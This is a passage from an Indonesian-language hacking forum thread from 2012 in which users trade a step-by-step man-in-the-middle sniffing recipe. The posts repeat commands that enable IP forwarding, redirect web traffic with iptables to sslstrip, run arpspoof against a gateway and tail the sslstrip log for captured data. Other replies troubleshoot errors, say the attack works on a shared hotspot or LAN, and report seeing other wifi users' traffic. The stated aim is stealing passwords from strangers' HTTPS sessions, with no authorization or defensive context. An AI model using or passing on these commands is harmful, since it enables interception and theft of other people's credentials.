Ngebahas Sniffing Lagi yuk...
#11
(07-01-2012, 11:56 PM)mocyn36 Wrote:
(07-01-2012, 11:45 PM)RR12 Wrote: kalo sniffing sih ... biasanya cuman pake command2 dibawah ini sih !!!
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip
arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

tinggal di tunggu aja data yg di capture ama sslstrip
Code:
tail -f sslstrip.log

ada tutorial step - step nya mas???, itu BT4 R2 bisa ya??, nangkep jaringan Https ya??

seharusnya bisa work juga di BT4...
itu nangkap HTTPS Trafic, sslstrip itu kan gunanya untuk itu !!

#12
(07-02-2012, 01:17 AM)Alsad91 Wrote:
(07-02-2012, 12:44 AM)RR12 Wrote:
(07-01-2012, 11:56 PM)mocyn36 Wrote:
(07-01-2012, 11:45 PM)RR12 Wrote: kalo sniffing sih ... biasanya cuman pake command2 dibawah ini sih !!!
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip
arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

tinggal di tunggu aja data yg di capture ama sslstrip
Code:
tail -f sslstrip.log
itu step2 codingnya ya apa sama persis itu bro.., mulai dari atas sampe bawah??....,
ada tutorial step - step nya mas???, itu BT4 R2 bisa ya??, nangkep jaringan Https ya??

seharusnya bisa work juga di BT4...
itu nangkap HTTPS Trafic, sslstrip itu kan gunanya untuk itu !!

owh...., itu codingnya step step urutanya sama kayak itu ya mas,,, dari atas sampe bawah??

terus kalo ane pake scriptnya bang zee, yang egharts.sh
kok sslstripnya ada error kayak gini ya???, gmana ya??
[Image: pict1.jpg]

#13
step stepnya mana ya ohm??
klo pake egharts.sh kok sslstripnys ada error kayak gini gmana ya ohm???

[Image: pict1.jpg]
Thansk

kalo pake coding ini nulisnya gini ya ntar

BT:# echo 1 > /proc/sys/net/ipv4/ip_forward
BT:#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
BT:#sslstrip
BT:#arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

Code:
BT:#tail -f sslstrip.log

#14
(07-02-2012, 02:17 AM)mocyn36 Wrote: step stepnya mana ya ohm??
klo pake egharts.sh kok sslstripnys ada error kayak gini gmana ya ohm???

[Image: pict1.jpg]
Thansk

kalo pake coding ini nulisnya gini ya ntar

BT:# echo 1 > /proc/sys/net/ipv4/ip_forward
BT:#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
BT:#sslstrip
BT:#arpspoof -i [interface] [ip_gateway]
itu aja sih biasanya !

Code:
BT:#tail -f sslstrip.log


kalo error pada sslstrip itu kayaknya bermasalah pada iptable nya.., coba qm edit pada ettercap, bisa pake # nano /etc/etter.conf
ntar qm cari di bagian bawah ada
linux terus bawahnya ada beberapa pilihan untu mengaktifkan iptable apa tidak, itu qm ilangin tanda "#" terus qm simpan ( ctrl+ x) tekan "Y"

itu pake coding egharts Bukan???,, ngomong2 aq pake script egharts.sh kok tetep kagak bisa nangkep pass dari HTTPS ya???, mohon kawan2 yang tahu gimana solusinya buat sniffing https ini, di share di mari

Thanks


#15
bro ijin nyimak ama pengen nanya..? untuk melakukan Sniffing apa dari jaringan yg sama or dari luar jaringan yah
maaf ane masi baru
SALAM KENAL SEMUA PARA TEMAN-TEMAN IBT
TOLONG BIMBINGANNYA

#16
satu jaringan bro , hotspot area/dengan kabel lan

#17
met malem kk, saya masih baru disini
boleh minta link pembahasan dari awalnya ga?
coz ane dah ubeke2 yg ketemu pembahasan menegah ke akhir
makasih sebelumnya Big Grin

#18
bro ane juga gak bisa yang kebuka malah foto foto google yang diakses ama pengguna wifi ,,,,, tapi kalo buka facebook gak nampil tuh foto gimana nih ? ane tes di kali linux tanpa ada eroor

#19
lagi-lagi ane blank screen.................. ane ijin nyimak dulu





Users browsing this thread: 1 Guest(s)